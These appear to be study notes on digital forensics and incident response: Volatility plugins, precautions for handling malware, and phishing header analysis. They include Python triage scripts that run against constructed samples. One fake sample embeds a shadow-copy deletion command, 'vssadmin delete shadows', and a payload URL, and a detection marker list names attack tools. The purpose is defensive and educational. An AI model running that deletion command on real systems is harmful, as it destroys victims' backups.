.bmp : file extension of the desktop wallpaper

KAPE

KAPE serves two primary purposes,

1) collect files 2) process the collected files as per the provided options

Volatility

Volatility is the world's most widely used framework for extracting digital artifacts from volatile memory (RAM) samples.

Useful plugins (Volatility 3 syntax)

  • vol -f 'dump.vmem' windows.info [basic info ]

  • vol -f 'dump.vmem' windows.pslist [lists processes by walking the kernel's active-process list; includes recently exited processes still linked in it, but misses processes a rootkit has unlinked]

  • vol -f 'dump.vmem' windows.psscan [scans memory for data structures that match _EPROCESS, so it also finds the processes that malware, typically rootkits, hides from pslist; compare the two outputs]

  • vol -f 'dump.vmem' windows.pstree [list all processes based on their parent process ID]

  • vol -f 'dump.vmem' windows.dlllist [filter output to a specific DLL that might be an indicator for a specific type of malware]

  • vol -f 'dump.vmem' windows.malfind [identify injected processes and their PIDs]

  • vol -f 'dump.vmem' windows.yarascan [search for strings, patterns, and compound rules against a rule set]

  • vol -f 'dump.vmem' windows.ssdt [System Service Descriptor Table; rootkits hook into this table and modify its pointers to point to their own code]

  • vol -f 'dump.vmem' windows.modules [lists loaded kernel modules, useful for identifying active malware; however, if a malicious module is idly waiting or hidden, this plugin may miss it]

  • vol -f 'dump.vmem' windows.driverscan [identifies driver files in the kernel that the modules plugin might have missed or that were hidden]

Other plugins --> [modscan driverirp callbacks idt apihooks moddump handles]

Velociraptor

endpoint monitoring, digital forensic and cyber response platform

TheHive Project

Three core functions:

  • Collaborate: Multiple analysts from one organisation can work together on the same case simultaneously.

  • Elaborate: Investigations correspond to cases. The details of each case can be broken down into associated tasks

  • Act: A quick triaging process can be supported by allowing analysts to add observables to their cases, leveraging tags, flagging IOCs

Malware is derived from the term MALicious softWARE

Take the following precautions while analyzing malware:

  • Never analyze malware or suspected malware on a machine that does not have the sole purpose of analyzing malware.

  • When not analyzing or moving malware samples around to different locations, always keep them in password-protected zip/rar or other archives so that we can avoid accidental detonation.

  • Only extract the malware from this password-protected archive inside the isolated environment, and only when analyzing it.

  • Create an isolated VM specifically for malware analysis, which has the capability of being reverted to a clean slate once you are done.

  • Ensure that all internet connections are closed or at least monitored.

  • Once you are done with malware analysis, revert the VM to its clean slate for the next malware analysis session to avoid residue from a previous malware execution corrupting the next one.

When malware is analysed without being executed, it is called static analysis. Dynamic analysis runs the malware, usually in an isolated VM, and observes its behaviour.

  • File type : file

  • Examining strings : strings

  • Calculating hashes : md5sum, sha1sum, sha256sum

  • PE header information (e.g. what pecheck extracted from the PE header of the WannaCry sample) : pecheck
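The four static steps above in one script, an added example that is not part of the TryHackMe material and does not touch the WannaCry sample: it hashes the input (md5sum/sha1sum/sha256sum), pulls printable strings (strings -n 4), identifies the file type from its magic bytes (file) and parses the PE signature and COFF header (the first thing pecheck prints). The input is a constructed byte string shaped like a tiny PE file, not a real executable, so the script runs offline without any malware on disk; the list of suspicious string markers is an assumption.

```python
"""Static triage of a suspected sample: hashes, strings, file type, PE header.

Added example, not from the TryHackMe notes. build_fake_pe() returns a
constructed stand-in (MZ stub, PE signature, COFF header, a few strings) so
the functions can be exercised without a real sample; pass bytes read from
a file for real use.
"""
import hashlib
import re
import struct

SUSPICIOUS = ("vssadmin", "http://", "powershell", "cmd.exe")  # assumed markers


def hashes(data):
    """Same digests as md5sum / sha1sum / sha256sum."""
    return {a: hashlib.new(a, data).hexdigest() for a in ("md5", "sha1", "sha256")}


def strings(data, min_len=4):
    """Printable ASCII runs, like `strings -n 4`."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def suspicious_strings(data):
    """Strings containing one of the assumed markers (URLs, shadow-copy deletion, ...)."""
    return [s for s in strings(data) if any(k in s.lower() for k in SUSPICIOUS)]


def file_type(data):
    """Magic-byte identification in the spirit of `file`."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of "PE\0\0"
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "PE32/PE32+ executable (MS Windows)"
        return "MS-DOS executable"
    if data[:4] == b"\x7fELF":
        return "ELF"
    return "data"


def pe_header(data):
    """Machine, section count and compile timestamp from the COFF header."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return {"machine": hex(machine), "sections": nsections, "compile_time": timestamp}


def build_fake_pe():
    """Constructed stand-in, not a real executable: DOS header with e_lfanew=0x40,
    PE signature, a COFF header (i386, 3 sections) and some telling strings."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x5A3E1F00, 0, 0, 0xE0, 0x102)
    blob = (b"\x00kernel32.dll\x00CreateFileW\x00http://198.51.100.9/payload\x00"
            b"cmd.exe /c vssadmin delete shadows /all /quiet\x00")
    return bytes(dos) + b"PE\0\0" + coff + blob


if __name__ == "__main__":
    sample = build_fake_pe()
    print(file_type(sample))
    print(hashes(sample))
    print(pe_header(sample))
    print(suspicious_strings(sample))
```

The compile timestamp is a UTC epoch and is trivially forged, so treat it as a hint, not evidence. The "vssadmin delete shadows" string is the shadow-copy deletion noted in the NTFS section below and is worth a detection on its own in process-creation logs.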

Cuckoo Sandbox is the most widely known sandbox in the malware analysis community. CAPE Sandbox is a more advanced derivative of Cuckoo. Online --> analyse samples using [ Hybrid Analysis ]

Phishing Analysis Fundamentals

There are 3 protocols involved in sending and receiving email messages, briefly listed below.

  • SMTP (Simple Mail Transfer Protocol) - handles the sending of email, from client to server and between servers. [ port 25 (587 for client submission) ]

  • POP3 (Post Office Protocol v3) - transfers email from the mail server to a client; messages are downloaded and, by default, removed from the server. [ port 110 ]

  • IMAP (Internet Message Access Protocol) - transfers email between a client and the mail server; messages are copied and stay on the server, so multiple devices see the same mailbox. [ port 143 ]

Where can you retrieve more information about an IP? --> https://www.arin.net/ (the regional registry for North America; other regions have their own RIRs)

  • Spam - unsolicited junk emails sent out in bulk to a large number of recipients. The more malicious variant of Spam is known as MalSpam.

  • Phishing - emails sent to a target(s) purporting to be from a trusted entity to lure individuals into providing sensitive information.

  • Spear phishing - takes phishing a step further by targeting a specific individual(s) or organization seeking sensitive information.

  • Whaling - is similar to spear phishing, but it's targeted specifically to C-Level high-position individuals (CEO, CFO, etc.), and the objective is the same.

  • Smishing - takes phishing to mobile devices by targeting mobile users with specially crafted text messages.

  • Vishing - is similar to smishing, but instead of using text messages for the social engineering attack, the attacks are based on voice calls.

A BEC ( business email compromise ) is when an adversary gains control of an internal employee's account and then uses the compromised email account to convince other internal employees to perform unauthorized or fraudulent actions.

BCC (Blind Carbon Copy) : when sending an email message to a large number of people. When you place email addresses in the BCC field of a message, those addresses are invisible to the recipients of the email.

Header analysers :

  • Messageheader : https://toolbox.googleapps.com/apps/messageheader/analyzeheader

  • Message Header Analyzer : https://mha.azurewebsites.net/

  • mailheader.org

IP and URL reputation :

  • IPinfo.io : https://ipinfo.io/ --> scan IPs

  • URLScan.io : https://urlscan.io/ --> scan sites [domains]

  • URL2PNG and Wannabrowser --> render a URL safely

  • Talos Reputation Center : https://talosintelligence.com/reputation

  • URL Extractor : https://www.convertcsv.com/url-extractor.htm

Some of these online malware sandboxes are listed below.

  • Any.Run: https://app.any.run/

  • Hybrid Analysis: https://www.hybrid-analysis.com/

  • Joe Sandbox : https://www.joesecurity.org/

More tools

  • https://mxtoolbox.com/

  • https://phishtank.com/?

  • https://www.spamhaus.org/

Defender Actions

  • Sender Policy Framework (SPF) : a DNS TXT record listing the mail servers authorized to send email for a domain; receiving servers (Internet Service Providers included) check the connecting server against it.

  • DomainKeys Identified Mail (DKIM) : the sending server signs the message with a private key and publishes the public key in DNS, authenticating the email that is being sent. DKIM's advantage over SPF is that the signature survives forwarding.

  • DMARC (Domain-based Message Authentication, Reporting & Conformance) : builds on SPF and DKIM, tells receivers what to do when both fail, and provides feedback reports that allow you to troubleshoot your SPF and DKIM configurations if needed. Let's use the Domain Health Checker from [ dmarcian.com ] and check the DMARC status of site.com.
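The header analysers and the SPF/DKIM/DMARC verdicts above come together when you triage a reported phish. This added example (not from the TryHackMe material) uses Python's email package on a constructed message: it walks the Received chain to find the originating IP, reads the Authentication-Results header the receiving server stamped on the mail (spf/dkim/dmarc outcomes), and flags the classic mismatch between the From domain and the Return-Path / Reply-To domains. The message, domains and IPs are all constructed; the verdict logic is an assumption about what to escalate.

```python
"""Triage email headers: Received chain, auth results, sender domain mismatch.

Added example, not part of the TryHackMe notes. SAMPLE_EMAIL is a constructed
phishing-style message whose Authentication-Results header was written as a
receiving server would stamp it; real headers are read from a .eml file.
"""
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

SAMPLE_EMAIL = b"""\
Return-Path: <bounce@mail-sender.example>
Received: from mx.victim.example (mx.victim.example [192.0.2.10]) by inbound.victim.example with ESMTPS id abc123; Thu, 22 Dec 2022 15:00:10 +0000
Received: from relay.mail-sender.example (relay.mail-sender.example [203.0.113.55]) by mx.victim.example with ESMTP id def456; Thu, 22 Dec 2022 15:00:08 +0000
Received: from [198.51.100.23] (unknown [198.51.100.23]) by relay.mail-sender.example with ESMTPA; Thu, 22 Dec 2022 15:00:05 +0000
Authentication-Results: mx.victim.example; spf=fail smtp.mailfrom=mail-sender.example; dkim=none; dmarc=fail header.from=bank.example
From: "Bank Security" <alerts@bank.example>
Reply-To: support-desk@bank-secure-login.example
To: jane.doe@victim.example
Subject: Urgent: verify your account
Message-ID: <20221222150005.1234@relay.mail-sender.example>
Content-Type: text/plain; charset="utf-8"

Please verify your account at http://bank-secure-login.example/verify
"""


def parse(raw):
    return BytesParser(policy=policy.default).parsebytes(raw)


def received_chain(msg):
    """(sending IP, receiving host) per hop, earliest hop first.
    Received headers are prepended, so the bottom one is the origin."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        ip = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", hdr)
        by = re.search(r"\bby (\S+)", hdr)
        hops.append((ip.group(1) if ip else None, by.group(1) if by else None))
    return hops


def auth_results(msg):
    """{'spf': ..., 'dkim': ..., 'dmarc': ...} from Authentication-Results."""
    results = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for mech, outcome in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", hdr):
            results[mech] = outcome
    return results


def domain_of(addr_header):
    """Domain part of an address header, lower-cased ('' if absent)."""
    return parseaddr(str(addr_header or ""))[1].rpartition("@")[2].lower()


def sender_mismatches(msg):
    """Return-Path / Reply-To domains that disagree with the From domain."""
    from_domain = domain_of(msg["From"])
    return [f"{hdr} domain {domain_of(msg[hdr])} != From domain {from_domain}"
            for hdr in ("Return-Path", "Reply-To")
            if domain_of(msg[hdr]) and domain_of(msg[hdr]) != from_domain]


def verdict(msg):
    """('suspicious' | 'clean', reasons): any non-pass auth result or a mismatch."""
    auth = auth_results(msg)
    reasons = [f"{m}={v}" for m, v in auth.items() if v != "pass"] + sender_mismatches(msg)
    return ("suspicious" if reasons else "clean"), reasons


if __name__ == "__main__":
    msg = parse(SAMPLE_EMAIL)
    for ip, by in received_chain(msg):
        print(f"{ip:>15} -> {by}")
    print(auth_results(msg))
    print(verdict(msg))
```

The origin IP (198.51.100.23) is what goes to ipinfo.io / ARIN / Talos; only trust Received lines added by your own servers, since everything below your boundary MTA can be forged by the sender. A dmarc=fail with a bank's domain in From is the single strongest signal here, because it means the From domain's owner publishes a policy and this mail did not satisfy it.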
